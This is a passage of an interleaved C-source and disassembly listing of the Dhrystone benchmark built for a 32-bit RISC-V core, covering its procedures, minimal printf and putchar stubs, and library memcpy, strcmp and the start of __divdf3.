80000742: 4a9a lw s5,132(sp)
80000744: 4b0a lw s6,128(sp)
80000746: 5bf6 lw s7,124(sp)
80000748: 5c66 lw s8,120(sp)
8000074a: 5cd6 lw s9,116(sp)
8000074c: 5d46 lw s10,112(sp)
8000074e: 5db6 lw s11,108(sp)
80000750: 610d addi sp,sp,160
80000752: 8082 ret
Proc_6 (Ident_1, &Enum_Loc);
80000754: 086c addi a1,sp,28
80000756: 4501 li a0,0
80000758: 2291 jal 8000089c <Proc_6>
strcpy (Str_2_Loc, "DHRYSTONE PROGRAM, 3'RD STRING");
8000075a: 004cae03 lw t3,4(s9)
8000075e: 008ca303 lw t1,8(s9)
80000762: 00cca883 lw a7,12(s9)
80000766: 010ca803 lw a6,16(s9)
8000076a: 014ca503 lw a0,20(s9)
8000076e: 018ca583 lw a1,24(s9)
80000772: 01ccd603 lhu a2,28(s9)
80000776: 01ecc703 lbu a4,30(s9)
for (Ch_Index = 'A'; Ch_Index <= Ch_2_Glob; ++Ch_Index)
8000077a: 8341c783 lbu a5,-1996(gp) # 800034d4 <Ch_2_Glob>
8000077e: 0a85 addi s5,s5,1
strcpy (Str_2_Loc, "DHRYSTONE PROGRAM, 3'RD STRING");
80000780: c0de sw s7,64(sp)
80000782: c2f2 sw t3,68(sp)
80000784: c49a sw t1,72(sp)
80000786: c6c6 sw a7,76(sp)
80000788: c8c2 sw a6,80(sp)
8000078a: caaa sw a0,84(sp)
8000078c: ccae sw a1,88(sp)
8000078e: 04c11e23 sh a2,92(sp)
80000792: 04e10f23 sb a4,94(sp)
Int_Glob = Run_Index;
80000796: 8331ae23 sw s3,-1988(gp) # 800034dc <Int_Glob>
for (Ch_Index = 'A'; Ch_Index <= Ch_2_Glob; ++Ch_Index)
8000079a: 0ffafa93 andi s5,s5,255
8000079e: 8a4e mv s4,s3
800007a0: c357f5e3 bleu s5,a5,800003ca <main2+0x1ae>
800007a4: b191 j 800003e8 <main2+0x1cc>
printf ("Program compiled without 'register' attribute\n");
800007a6: 80003537 lui a0,0x80003
800007aa: d6050513 addi a0,a0,-672 # 80002d60 <_stack_start+0xffffc890>
800007ae: 2455 jal 80000a52 <puts>
printf ("\n");
800007b0: 4529 li a0,10
800007b2: 24d9 jal 80000a78 <putchar>
800007b4: be35 j 800002f0 <main2+0xd4>
printf ("Measured time too small to obtain meaningful results\n");
800007b6: 80003537 lui a0,0x80003
800007ba: 1a850513 addi a0,a0,424 # 800031a8 <_stack_start+0xffffccd8>
800007be: 2c51 jal 80000a52 <puts>
printf ("Please increase number of runs\n");
800007c0: 80003537 lui a0,0x80003
800007c4: 1e050513 addi a0,a0,480 # 800031e0 <_stack_start+0xffffcd10>
800007c8: 2469 jal 80000a52 <puts>
printf ("\n");
800007ca: 4529 li a0,10
800007cc: 2475 jal 80000a78 <putchar>
800007ce: b7a5 j 80000736 <main2+0x51a>
if(dmipsReal < 10) printf("0");
800007d0: 03000513 li a0,48
800007d4: 2455 jal 80000a78 <putchar>
800007d6: bf81 j 80000726 <main2+0x50a>
800007d8 <Proc_7>:
One_Fifty Int_2_Par_Val;
One_Fifty *Int_Par_Ref;
{
One_Fifty Int_Loc;
Int_Loc = Int_1_Par_Val + 2;
800007d8: 0509 addi a0,a0,2
*Int_Par_Ref = Int_2_Par_Val + Int_Loc;
800007da: 95aa add a1,a1,a0
800007dc: c20c sw a1,0(a2)
} /* Proc_7 */
800007de: 8082 ret
800007e0 <Proc_8>:
/* Int_Par_Val_2 == 7 */
Arr_1_Dim Arr_1_Par_Ref;
Arr_2_Dim Arr_2_Par_Ref;
int Int_1_Par_Val;
int Int_2_Par_Val;
{
800007e0: 1101 addi sp,sp,-32
800007e2: c64e sw s3,12(sp)
REG One_Fifty Int_Index;
REG One_Fifty Int_Loc;
Int_Loc = Int_1_Par_Val + 5;
800007e4: 00560993 addi s3,a2,5
{
800007e8: ca26 sw s1,20(sp)
Arr_1_Par_Ref [Int_Loc] = Int_2_Par_Val;
800007ea: 00299493 slli s1,s3,0x2
{
800007ee: cc22 sw s0,24(sp)
800007f0: c84a sw s2,16(sp)
800007f2: ce06 sw ra,28(sp)
Arr_1_Par_Ref [Int_Loc] = Int_2_Par_Val;
800007f4: 94aa add s1,s1,a0
{
800007f6: 8932 mv s2,a2
800007f8: 842e mv s0,a1
Arr_1_Par_Ref [Int_Loc+1] = Arr_1_Par_Ref [Int_Loc];
Arr_1_Par_Ref [Int_Loc+30] = Int_Loc;
800007fa: 0734ac23 sw s3,120(s1)
Arr_1_Par_Ref [Int_Loc] = Int_2_Par_Val;
800007fe: c094 sw a3,0(s1)
Arr_1_Par_Ref [Int_Loc+1] = Arr_1_Par_Ref [Int_Loc];
80000800: c0d4 sw a3,4(s1)
for (Int_Index = Int_Loc; Int_Index <= Int_Loc+1; ++Int_Index)
Arr_2_Par_Ref [Int_Loc] [Int_Index] = Int_Loc;
80000802: 854e mv a0,s3
80000804: 0c800593 li a1,200
80000808: 3a0020ef jal ra,80002ba8 <__mulsi3>
8000080c: 090a slli s2,s2,0x2
8000080e: 012507b3 add a5,a0,s2
80000812: 97a2 add a5,a5,s0
Arr_2_Par_Ref [Int_Loc] [Int_Loc-1] += 1;
80000814: 4b98 lw a4,16(a5)
Arr_2_Par_Ref [Int_Loc] [Int_Index] = Int_Loc;
80000816: 0137aa23 sw s3,20(a5)
8000081a: 0137ac23 sw s3,24(a5)
Arr_2_Par_Ref [Int_Loc] [Int_Loc-1] += 1;
8000081e: 0705 addi a4,a4,1
80000820: cb98 sw a4,16(a5)
Arr_2_Par_Ref [Int_Loc+20] [Int_Loc] = Arr_1_Par_Ref [Int_Loc];
80000822: 409c lw a5,0(s1)
80000824: 942a add s0,s0,a0
80000826: 944a add s0,s0,s2
80000828: 6605 lui a2,0x1
8000082a: 9432 add s0,s0,a2
8000082c: faf42a23 sw a5,-76(s0)
Int_Glob = 5;
} /* Proc_8 */
80000830: 40f2 lw ra,28(sp)
80000832: 4462 lw s0,24(sp)
Int_Glob = 5;
80000834: 4715 li a4,5
80000836: 82e1ae23 sw a4,-1988(gp) # 800034dc <Int_Glob>
} /* Proc_8 */
8000083a: 44d2 lw s1,20(sp)
8000083c: 4942 lw s2,16(sp)
8000083e: 49b2 lw s3,12(sp)
80000840: 6105 addi sp,sp,32
80000842: 8082 ret
80000844 <Func_1>:
/* second call: Ch_1_Par_Val == 'A', Ch_2_Par_Val == 'C' */
/* third call: Ch_1_Par_Val == 'B', Ch_2_Par_Val == 'C' */
Capital_Letter Ch_1_Par_Val;
Capital_Letter Ch_2_Par_Val;
{
80000844: 0ff57513 andi a0,a0,255
80000848: 0ff5f593 andi a1,a1,255
Capital_Letter Ch_1_Loc;
Capital_Letter Ch_2_Loc;
Ch_1_Loc = Ch_1_Par_Val;
Ch_2_Loc = Ch_1_Loc;
if (Ch_2_Loc != Ch_2_Par_Val)
8000084c: 00b50463 beq a0,a1,80000854 <Func_1+0x10>
/* then, executed */
return (Ident_1);
80000850: 4501 li a0,0
else /* not executed */
{
Ch_1_Glob = Ch_1_Loc;
return (Ident_2);
}
} /* Func_1 */
80000852: 8082 ret
Ch_1_Glob = Ch_1_Loc;
80000854: 82a18aa3 sb a0,-1995(gp) # 800034d5 <Ch_1_Glob>
return (Ident_2);
80000858: 4505 li a0,1
8000085a: 8082 ret
8000085c <Func_2>:
/* Str_1_Par_Ref == "DHRYSTONE PROGRAM, 1'ST STRING" */
/* Str_2_Par_Ref == "DHRYSTONE PROGRAM, 2'ND STRING" */
Str_30 Str_1_Par_Ref;
Str_30 Str_2_Par_Ref;
{
8000085c: 1141 addi sp,sp,-16
8000085e: c422 sw s0,8(sp)
80000860: c226 sw s1,4(sp)
80000862: c606 sw ra,12(sp)
80000864: 842a mv s0,a0
80000866: 84ae mv s1,a1
REG One_Thirty Int_Loc;
Capital_Letter Ch_Loc;
Int_Loc = 2;
while (Int_Loc <= 2) /* loop body executed once */
if (Func_1 (Str_1_Par_Ref[Int_Loc],
80000868: 0034c583 lbu a1,3(s1)
8000086c: 00244503 lbu a0,2(s0)
80000870: 3fd1 jal 80000844 <Func_1>
80000872: f97d bnez a0,80000868 <Func_2+0xc>
if (Ch_Loc == 'R')
/* then, not executed */
return (true);
else /* executed */
{
if (strcmp (Str_1_Par_Ref, Str_2_Par_Ref) > 0)
80000874: 85a6 mv a1,s1
80000876: 8522 mv a0,s0
80000878: 2cf5 jal 80000b74 <strcmp>
Int_Loc += 7;
Int_Glob = Int_Loc;
return (true);
}
else /* executed */
return (false);
8000087a: 4781 li a5,0
if (strcmp (Str_1_Par_Ref, Str_2_Par_Ref) > 0)
8000087c: 00a05663 blez a0,80000888 <Func_2+0x2c>
Int_Glob = Int_Loc;
80000880: 4729 li a4,10
80000882: 82e1ae23 sw a4,-1988(gp) # 800034dc <Int_Glob>
return (true);
80000886: 4785 li a5,1
} /* if Ch_Loc */
} /* Func_2 */
80000888: 40b2 lw ra,12(sp)
8000088a: 4422 lw s0,8(sp)
8000088c: 4492 lw s1,4(sp)
8000088e: 853e mv a0,a5
80000890: 0141 addi sp,sp,16
80000892: 8082 ret
80000894 <Func_3>:
Enumeration Enum_Par_Val;
{
Enumeration Enum_Loc;
Enum_Loc = Enum_Par_Val;
if (Enum_Loc == Ident_3)
80000894: 1579 addi a0,a0,-2
/* then, executed */
return (true);
else /* not executed */
return (false);
} /* Func_3 */
80000896: 00153513 seqz a0,a0
8000089a: 8082 ret
8000089c <Proc_6>:
{
8000089c: 1141 addi sp,sp,-16
8000089e: c422 sw s0,8(sp)
800008a0: c226 sw s1,4(sp)
800008a2: c606 sw ra,12(sp)
800008a4: 842a mv s0,a0
800008a6: 84ae mv s1,a1
if (! Func_3 (Enum_Val_Par))
800008a8: 37f5 jal 80000894 <Func_3>
800008aa: c115 beqz a0,800008ce <Proc_6+0x32>
*Enum_Ref_Par = Enum_Val_Par;
800008ac: c080 sw s0,0(s1)
switch (Enum_Val_Par)
800008ae: 4785 li a5,1
800008b0: 02f40463 beq s0,a5,800008d8 <Proc_6+0x3c>
800008b4: c805 beqz s0,800008e4 <Proc_6+0x48>
800008b6: 4709 li a4,2
800008b8: 02e40d63 beq s0,a4,800008f2 <Proc_6+0x56>
800008bc: 4791 li a5,4
800008be: 00f41363 bne s0,a5,800008c4 <Proc_6+0x28>
*Enum_Ref_Par = Ident_3;
800008c2: c098 sw a4,0(s1)
} /* Proc_6 */
800008c4: 40b2 lw ra,12(sp)
800008c6: 4422 lw s0,8(sp)
800008c8: 4492 lw s1,4(sp)
800008ca: 0141 addi sp,sp,16
800008cc: 8082 ret
*Enum_Ref_Par = Ident_4;
800008ce: 478d li a5,3
800008d0: c09c sw a5,0(s1)
switch (Enum_Val_Par)
800008d2: 4785 li a5,1
800008d4: fef410e3 bne s0,a5,800008b4 <Proc_6+0x18>
if (Int_Glob > 100)
800008d8: 83c1a703 lw a4,-1988(gp) # 800034dc <Int_Glob>
800008dc: 06400793 li a5,100
800008e0: 00e7df63 ble a4,a5,800008fe <Proc_6+0x62>
} /* Proc_6 */
800008e4: 40b2 lw ra,12(sp)
800008e6: 4422 lw s0,8(sp)
*Enum_Ref_Par = Ident_1;
800008e8: 0004a023 sw zero,0(s1)
} /* Proc_6 */
800008ec: 4492 lw s1,4(sp)
800008ee: 0141 addi sp,sp,16
800008f0: 8082 ret
800008f2: 40b2 lw ra,12(sp)
800008f4: 4422 lw s0,8(sp)
*Enum_Ref_Par = Ident_2;
800008f6: c09c sw a5,0(s1)
} /* Proc_6 */
800008f8: 4492 lw s1,4(sp)
800008fa: 0141 addi sp,sp,16
800008fc: 8082 ret
800008fe: 40b2 lw ra,12(sp)
80000900: 4422 lw s0,8(sp)
else *Enum_Ref_Par = Ident_4;
80000902: 478d li a5,3
80000904: c09c sw a5,0(s1)
} /* Proc_6 */
80000906: 4492 lw s1,4(sp)
80000908: 0141 addi sp,sp,16
8000090a: 8082 ret
8000090c <printf_s>:
{
putchar(c);
}
static void printf_s(char *p)
{
8000090c: 1141 addi sp,sp,-16
8000090e: c422 sw s0,8(sp)
80000910: c606 sw ra,12(sp)
80000912: 842a mv s0,a0
while (*p)
80000914: 00054503 lbu a0,0(a0)
80000918: c511 beqz a0,80000924 <printf_s+0x18>
putchar(*(p++));
8000091a: 0405 addi s0,s0,1
8000091c: 2ab1 jal 80000a78 <putchar>
while (*p)
8000091e: 00044503 lbu a0,0(s0)
80000922: fd65 bnez a0,8000091a <printf_s+0xe>
}
80000924: 40b2 lw ra,12(sp)
80000926: 4422 lw s0,8(sp)
80000928: 0141 addi sp,sp,16
8000092a: 8082 ret
8000092c <printf_c>:
putchar(c);
8000092c: a2b1 j 80000a78 <putchar>
8000092e <printf_d>:
static void printf_d(int val)
{
8000092e: 7179 addi sp,sp,-48
80000930: d226 sw s1,36(sp)
80000932: d606 sw ra,44(sp)
80000934: d422 sw s0,40(sp)
80000936: d04a sw s2,32(sp)
80000938: 84aa mv s1,a0
char buffer[32];
char *p = buffer;
if (val < 0) {
8000093a: 04054263 bltz a0,8000097e <printf_d+0x50>
{
8000093e: 890a mv s2,sp
80000940: 844a mv s0,s2
80000942: a829 j 8000095c <printf_d+0x2e>
printf_c('-');
val = -val;
}
while (val || p == buffer) {
*(p++) = '0' + val % 10;
80000944: 30c020ef jal ra,80002c50 <__modsi3>
80000948: 03050793 addi a5,a0,48
8000094c: 0405 addi s0,s0,1
val = val / 10;
8000094e: 8526 mv a0,s1
80000950: 45a9 li a1,10
*(p++) = '0' + val % 10;
80000952: fef40fa3 sb a5,-1(s0)
val = val / 10;
80000956: 276020ef jal ra,80002bcc <__divsi3>
8000095a: 84aa mv s1,a0
*(p++) = '0' + val % 10;
8000095c: 45a9 li a1,10
8000095e: 8526 mv a0,s1
while (val || p == buffer) {
80000960: f0f5 bnez s1,80000944 <printf_d+0x16>
80000962: ff2401e3 beq s0,s2,80000944 <printf_d+0x16>
}
while (p != buffer)
printf_c(*(--p));
80000966: 147d addi s0,s0,-1
80000968: 00044503 lbu a0,0(s0)
8000096c: 37c1 jal 8000092c <printf_c>
while (p != buffer)
8000096e: ff241ce3 bne s0,s2,80000966 <printf_d+0x38>
}
80000972: 50b2 lw ra,44(sp)
80000974: 5422 lw s0,40(sp)
80000976: 5492 lw s1,36(sp)
80000978: 5902 lw s2,32(sp)
8000097a: 6145 addi sp,sp,48
8000097c: 8082 ret
printf_c('-');
8000097e: 02d00513 li a0,45
80000982: 376d jal 8000092c <printf_c>
val = -val;
80000984: 409004b3 neg s1,s1
80000988: bf5d j 8000093e <printf_d+0x10>
8000098a <malloc>:
char *p = heap_memory + heap_memory_used;
8000098a: 8481a703 lw a4,-1976(gp) # 800034e8 <heap_memory_used>
heap_memory_used += size;
8000098e: 00a707b3 add a5,a4,a0
char *p = heap_memory + heap_memory_used;
80000992: 80006537 lui a0,0x80006
heap_memory_used += size;
80000996: 84f1a423 sw a5,-1976(gp) # 800034e8 <heap_memory_used>
char *p = heap_memory + heap_memory_used;
8000099a: cc450513 addi a0,a0,-828 # 80005cc4 <_stack_start+0xfffff7f4>
if (heap_memory_used > 1024)
8000099e: 40000693 li a3,1024
char *p = heap_memory + heap_memory_used;
800009a2: 953a add a0,a0,a4
if (heap_memory_used > 1024)
800009a4: 00f6d363 ble a5,a3,800009aa <malloc+0x20>
asm volatile ("ebreak");
800009a8: 9002 ebreak
}
800009aa: 8082 ret
800009ac <printf>:
int printf(const char *format, ...)
{
800009ac: 715d addi sp,sp,-80
800009ae: cc52 sw s4,24(sp)
800009b0: d606 sw ra,44(sp)
800009b2: d422 sw s0,40(sp)
800009b4: d226 sw s1,36(sp)
800009b6: d04a sw s2,32(sp)
800009b8: ce4e sw s3,28(sp)
800009ba: ca56 sw s5,20(sp)
800009bc: 8a2a mv s4,a0
int i;
va_list ap;
va_start(ap, format);
for (i = 0; format[i]; i++)
800009be: 00054503 lbu a0,0(a0)
{
800009c2: c2be sw a5,68(sp)
va_start(ap, format);
800009c4: 185c addi a5,sp,52
{
800009c6: da2e sw a1,52(sp)
800009c8: dc32 sw a2,56(sp)
800009ca: de36 sw a3,60(sp)
800009cc: c0ba sw a4,64(sp)
800009ce: c4c2 sw a6,72(sp)
800009d0: c6c6 sw a7,76(sp)
va_start(ap, format);
800009d2: c63e sw a5,12(sp)
for (i = 0; format[i]; i++)
800009d4: c11d beqz a0,800009fa <printf+0x4e>
800009d6: 4401 li s0,0
if (format[i] == '%') {
800009d8: 02500a93 li s5,37
while (format[++i]) {
if (format[i] == 'c') {
800009dc: 06300493 li s1,99
printf_c(va_arg(ap,int));
break;
}
if (format[i] == 's') {
800009e0: 07300913 li s2,115
printf_s(va_arg(ap,char*));
break;
}
if (format[i] == 'd') {
800009e4: 06400993 li s3,100
if (format[i] == '%') {
800009e8: 03550263 beq a0,s5,80000a0c <printf+0x60>
printf_d(va_arg(ap,int));
break;
}
}
} else
printf_c(format[i]);
800009ec: 3781 jal 8000092c <printf_c>
for (i = 0; format[i]; i++)
800009ee: 0405 addi s0,s0,1
800009f0: 008a07b3 add a5,s4,s0
800009f4: 0007c503 lbu a0,0(a5)
800009f8: f965 bnez a0,800009e8 <printf+0x3c>
va_end(ap);
}
800009fa: 50b2 lw ra,44(sp)
800009fc: 5422 lw s0,40(sp)
800009fe: 5492 lw s1,36(sp)
80000a00: 5902 lw s2,32(sp)
80000a02: 49f2 lw s3,28(sp)
80000a04: 4a62 lw s4,24(sp)
80000a06: 4ad2 lw s5,20(sp)
80000a08: 6161 addi sp,sp,80
80000a0a: 8082 ret
80000a0c: 00140693 addi a3,s0,1
80000a10: 00da0733 add a4,s4,a3
80000a14: a031 j 80000a20 <printf+0x74>
if (format[i] == 's') {
80000a16: 03278263 beq a5,s2,80000a3a <printf+0x8e>
if (format[i] == 'd') {
80000a1a: 03378663 beq a5,s3,80000a46 <printf+0x9a>
80000a1e: 0685 addi a3,a3,1
while (format[++i]) {
80000a20: 00074783 lbu a5,0(a4)
80000a24: 8436 mv s0,a3
80000a26: 0705 addi a4,a4,1
80000a28: d3f9 beqz a5,800009ee <printf+0x42>
if (format[i] == 'c') {
80000a2a: fe9796e3 bne a5,s1,80000a16 <printf+0x6a>
printf_c(va_arg(ap,int));
80000a2e: 47b2 lw a5,12(sp)
80000a30: 4388 lw a0,0(a5)
80000a32: 0791 addi a5,a5,4
80000a34: c63e sw a5,12(sp)
80000a36: 3ddd jal 8000092c <printf_c>
break;
80000a38: bf5d j 800009ee <printf+0x42>
printf_s(va_arg(ap,char*));
80000a3a: 47b2 lw a5,12(sp)
80000a3c: 4388 lw a0,0(a5)
80000a3e: 0791 addi a5,a5,4
80000a40: c63e sw a5,12(sp)
80000a42: 35e9 jal 8000090c <printf_s>
break;
80000a44: b76d j 800009ee <printf+0x42>
printf_d(va_arg(ap,int));
80000a46: 47b2 lw a5,12(sp)
80000a48: 4388 lw a0,0(a5)
80000a4a: 0791 addi a5,a5,4
80000a4c: c63e sw a5,12(sp)
80000a4e: 35c5 jal 8000092e <printf_d>
break;
80000a50: bf79 j 800009ee <printf+0x42>
80000a52 <puts>:
int puts(char *s){
80000a52: 1141 addi sp,sp,-16
80000a54: c422 sw s0,8(sp)
80000a56: c606 sw ra,12(sp)
80000a58: 842a mv s0,a0
while (*s) {
80000a5a: 00054503 lbu a0,0(a0)
80000a5e: c511 beqz a0,80000a6a <puts+0x18>
putchar(*s);
s++;
80000a60: 0405 addi s0,s0,1
putchar(*s);
80000a62: 2819 jal 80000a78 <putchar>
while (*s) {
80000a64: 00044503 lbu a0,0(s0)
80000a68: fd65 bnez a0,80000a60 <puts+0xe>
}
putchar('\n');
80000a6a: 4529 li a0,10
80000a6c: 2031 jal 80000a78 <putchar>
return 0;
}
80000a6e: 40b2 lw ra,12(sp)
80000a70: 4422 lw s0,8(sp)
80000a72: 4501 li a0,0
80000a74: 0141 addi sp,sp,16
80000a76: 8082 ret
80000a78 <putchar>:
void putchar(char c){
TEST_COM_BASE[0] = c;
80000a78: f01007b7 lui a5,0xf0100
80000a7c: f0a7a023 sw a0,-256(a5) # f00fff00 <_stack_start+0x700f9a30>
}
80000a80: 8082 ret
80000a82 <clock>:
#include <time.h>
clock_t clock(){
return TEST_COM_BASE[4];
80000a82: f01007b7 lui a5,0xf0100
80000a86: f107a503 lw a0,-240(a5) # f00fff10 <_stack_start+0x700f9a40>
}
80000a8a: 8082 ret
80000a8c <memcpy>:
80000a8c: 00a5c7b3 xor a5,a1,a0
80000a90: 0037f793 andi a5,a5,3
80000a94: 00c50733 add a4,a0,a2
80000a98: 00079663 bnez a5,80000aa4 <memcpy+0x18>
80000a9c: 00300793 li a5,3
80000aa0: 02c7e463 bltu a5,a2,80000ac8 <memcpy+0x3c>
80000aa4: 00050793 mv a5,a0
80000aa8: 00e56c63 bltu a0,a4,80000ac0 <memcpy+0x34>
80000aac: 00008067 ret
80000ab0: 0005c683 lbu a3,0(a1)
80000ab4: 00178793 addi a5,a5,1
80000ab8: 00158593 addi a1,a1,1
80000abc: fed78fa3 sb a3,-1(a5)
80000ac0: fee7e8e3 bltu a5,a4,80000ab0 <memcpy+0x24>
80000ac4: 00008067 ret
80000ac8: 00357793 andi a5,a0,3
80000acc: 08079263 bnez a5,80000b50 <memcpy+0xc4>
80000ad0: 00050793 mv a5,a0
80000ad4: ffc77693 andi a3,a4,-4
80000ad8: fe068613 addi a2,a3,-32
80000adc: 08c7f663 bleu a2,a5,80000b68 <memcpy+0xdc>
80000ae0: 0005a383 lw t2,0(a1)
80000ae4: 0045a283 lw t0,4(a1)
80000ae8: 0085af83 lw t6,8(a1)
80000aec: 00c5af03 lw t5,12(a1)
80000af0: 0105ae83 lw t4,16(a1)
80000af4: 0145ae03 lw t3,20(a1)
80000af8: 0185a303 lw t1,24(a1)
80000afc: 01c5a883 lw a7,28(a1)
80000b00: 02458593 addi a1,a1,36
80000b04: 02478793 addi a5,a5,36
80000b08: ffc5a803 lw a6,-4(a1)
80000b0c: fc77ae23 sw t2,-36(a5)
80000b10: fe57a023 sw t0,-32(a5)
80000b14: fff7a223 sw t6,-28(a5)
80000b18: ffe7a423 sw t5,-24(a5)
80000b1c: ffd7a623 sw t4,-20(a5)
80000b20: ffc7a823 sw t3,-16(a5)
80000b24: fe67aa23 sw t1,-12(a5)
80000b28: ff17ac23 sw a7,-8(a5)
80000b2c: ff07ae23 sw a6,-4(a5)
80000b30: fadff06f j 80000adc <memcpy+0x50>
80000b34: 0005c683 lbu a3,0(a1)
80000b38: 00178793 addi a5,a5,1
80000b3c: 00158593 addi a1,a1,1
80000b40: fed78fa3 sb a3,-1(a5)
80000b44: 0037f693 andi a3,a5,3
80000b48: fe0696e3 bnez a3,80000b34 <memcpy+0xa8>
80000b4c: f89ff06f j 80000ad4 <memcpy+0x48>
80000b50: 00050793 mv a5,a0
80000b54: ff1ff06f j 80000b44 <memcpy+0xb8>
80000b58: 0005a603 lw a2,0(a1)
80000b5c: 00478793 addi a5,a5,4
80000b60: 00458593 addi a1,a1,4
80000b64: fec7ae23 sw a2,-4(a5)
80000b68: fed7e8e3 bltu a5,a3,80000b58 <memcpy+0xcc>
80000b6c: f4e7eae3 bltu a5,a4,80000ac0 <memcpy+0x34>
80000b70: 00008067 ret
80000b74 <strcmp>:
80000b74: 00b56733 or a4,a0,a1
80000b78: fff00393 li t2,-1
80000b7c: 00377713 andi a4,a4,3
80000b80: 10071063 bnez a4,80000c80 <strcmp+0x10c>
80000b84: 7f7f87b7 lui a5,0x7f7f8
80000b88: f7f78793 addi a5,a5,-129 # 7f7f7f7f <_stack_size+0x7f7f7b7f>
80000b8c: 00052603 lw a2,0(a0)
80000b90: 0005a683 lw a3,0(a1)
80000b94: 00f672b3 and t0,a2,a5
80000b98: 00f66333 or t1,a2,a5
80000b9c: 00f282b3 add t0,t0,a5
80000ba0: 0062e2b3 or t0,t0,t1
80000ba4: 10729263 bne t0,t2,80000ca8 <strcmp+0x134>
80000ba8: 08d61663 bne a2,a3,80000c34 <strcmp+0xc0>
80000bac: 00452603 lw a2,4(a0)
80000bb0: 0045a683 lw a3,4(a1)
80000bb4: 00f672b3 and t0,a2,a5
80000bb8: 00f66333 or t1,a2,a5
80000bbc: 00f282b3 add t0,t0,a5
80000bc0: 0062e2b3 or t0,t0,t1
80000bc4: 0c729e63 bne t0,t2,80000ca0 <strcmp+0x12c>
80000bc8: 06d61663 bne a2,a3,80000c34 <strcmp+0xc0>
80000bcc: 00852603 lw a2,8(a0)
80000bd0: 0085a683 lw a3,8(a1)
80000bd4: 00f672b3 and t0,a2,a5
80000bd8: 00f66333 or t1,a2,a5
80000bdc: 00f282b3 add t0,t0,a5
80000be0: 0062e2b3 or t0,t0,t1
80000be4: 0c729863 bne t0,t2,80000cb4 <strcmp+0x140>
80000be8: 04d61663 bne a2,a3,80000c34 <strcmp+0xc0>
80000bec: 00c52603 lw a2,12(a0)
80000bf0: 00c5a683 lw a3,12(a1)
80000bf4: 00f672b3 and t0,a2,a5
80000bf8: 00f66333 or t1,a2,a5
80000bfc: 00f282b3 add t0,t0,a5
80000c00: 0062e2b3 or t0,t0,t1
80000c04: 0c729263 bne t0,t2,80000cc8 <strcmp+0x154>
80000c08: 02d61663 bne a2,a3,80000c34 <strcmp+0xc0>
80000c0c: 01052603 lw a2,16(a0)
80000c10: 0105a683 lw a3,16(a1)
80000c14: 00f672b3 and t0,a2,a5
80000c18: 00f66333 or t1,a2,a5
80000c1c: 00f282b3 add t0,t0,a5
80000c20: 0062e2b3 or t0,t0,t1
80000c24: 0a729c63 bne t0,t2,80000cdc <strcmp+0x168>
80000c28: 01450513 addi a0,a0,20
80000c2c: 01458593 addi a1,a1,20
80000c30: f4d60ee3 beq a2,a3,80000b8c <strcmp+0x18>
80000c34: 01061713 slli a4,a2,0x10
80000c38: 01069793 slli a5,a3,0x10
80000c3c: 00f71e63 bne a4,a5,80000c58 <strcmp+0xe4>
80000c40: 01065713 srli a4,a2,0x10
80000c44: 0106d793 srli a5,a3,0x10
80000c48: 40f70533 sub a0,a4,a5
80000c4c: 0ff57593 andi a1,a0,255
80000c50: 02059063 bnez a1,80000c70 <strcmp+0xfc>
80000c54: 00008067 ret
80000c58: 01075713 srli a4,a4,0x10
80000c5c: 0107d793 srli a5,a5,0x10
80000c60: 40f70533 sub a0,a4,a5
80000c64: 0ff57593 andi a1,a0,255
80000c68: 00059463 bnez a1,80000c70 <strcmp+0xfc>
80000c6c: 00008067 ret
80000c70: 0ff77713 andi a4,a4,255
80000c74: 0ff7f793 andi a5,a5,255
80000c78: 40f70533 sub a0,a4,a5
80000c7c: 00008067 ret
80000c80: 00054603 lbu a2,0(a0)
80000c84: 0005c683 lbu a3,0(a1)
80000c88: 00150513 addi a0,a0,1
80000c8c: 00158593 addi a1,a1,1
80000c90: 00d61463 bne a2,a3,80000c98 <strcmp+0x124>
80000c94: fe0616e3 bnez a2,80000c80 <strcmp+0x10c>
80000c98: 40d60533 sub a0,a2,a3
80000c9c: 00008067 ret
80000ca0: 00450513 addi a0,a0,4
80000ca4: 00458593 addi a1,a1,4
80000ca8: fcd61ce3 bne a2,a3,80000c80 <strcmp+0x10c>
80000cac: 00000513 li a0,0
80000cb0: 00008067 ret
80000cb4: 00850513 addi a0,a0,8
80000cb8: 00858593 addi a1,a1,8
80000cbc: fcd612e3 bne a2,a3,80000c80 <strcmp+0x10c>
80000cc0: 00000513 li a0,0
80000cc4: 00008067 ret
80000cc8: 00c50513 addi a0,a0,12
80000ccc: 00c58593 addi a1,a1,12
80000cd0: fad618e3 bne a2,a3,80000c80 <strcmp+0x10c>
80000cd4: 00000513 li a0,0
80000cd8: 00008067 ret
80000cdc: 01050513 addi a0,a0,16
80000ce0: 01058593 addi a1,a1,16
80000ce4: f8d61ee3 bne a2,a3,80000c80 <strcmp+0x10c>
80000ce8: 00000513 li a0,0
80000cec: 00008067 ret
80000cf0 <__divdf3>:
80000cf0: fb010113 addi sp,sp,-80
80000cf4: 04812423 sw s0,72(sp)
80000cf8: 03412c23 sw s4,56(sp)
80000cfc: 00100437 lui s0,0x100
80000d00: 0145da13 srli s4,a1,0x14
80000d04: 05212023 sw s2,64(sp)
80000d08: 03312e23 sw s3,60(sp)
80000d0c: 03512a23 sw s5,52(sp)
80000d10: 03812423 sw s8,40(sp)
80000d14: fff40413 addi s0,s0,-1 # fffff <_stack_size+0xffbff>
80000d18: 04112623 sw ra,76(sp)
80000d1c: 04912223 sw s1,68(sp)
80000d20: 03612823 sw s6,48(sp)
80000d24: 03712623 sw s7,44(sp)
80000d28: 03912223 sw s9,36(sp)
80000d2c: 03a12023 sw s10,32(sp)
80000d30: 01b12e23 sw s11,28(sp)
80000d34: 7ffa7a13 andi s4,s4,2047
80000d38: 00050913 mv s2,a0
80000d3c: 00060c13 mv s8,a2
80000d40: 00068a93 mv s5,a3
80000d44: 00b47433 and s0,s0,a1
80000d48: 01f5d993 srli s3,a1,0x1f
80000d4c: 0a0a0663 beqz s4,80000df8 <__divdf3+0x108>
80000d50: 7ff00793 li a5,2047
80000d54: 10fa0463 beq s4,a5,80000e5c <__divdf3+0x16c>
80000d58: 00341413 slli s0,s0,0x3
80000d5c: 008007b7 lui a5,0x800
80000d60: 00f46433 or s0,s0,a5
80000d64: 01d55b13 srli s6,a0,0x1d
80000d68: 008b6b33 or s6,s6,s0
80000d6c: 00351493 slli s1,a0,0x3
80000d70: c01a0a13 addi s4,s4,-1023
80000d74: 00000b93 li s7,0
80000d78: 014ad513 srli a0,s5,0x14
80000d7c: 00100937 lui s2,0x100
80000d80: fff90913 addi s2,s2,-1 # fffff <_stack_size+0xffbff>
80000d84: 7ff57513 andi a0,a0,2047
80000d88: 01597933 and s2,s2,s5
80000d8c: 000c0593 mv a1,s8
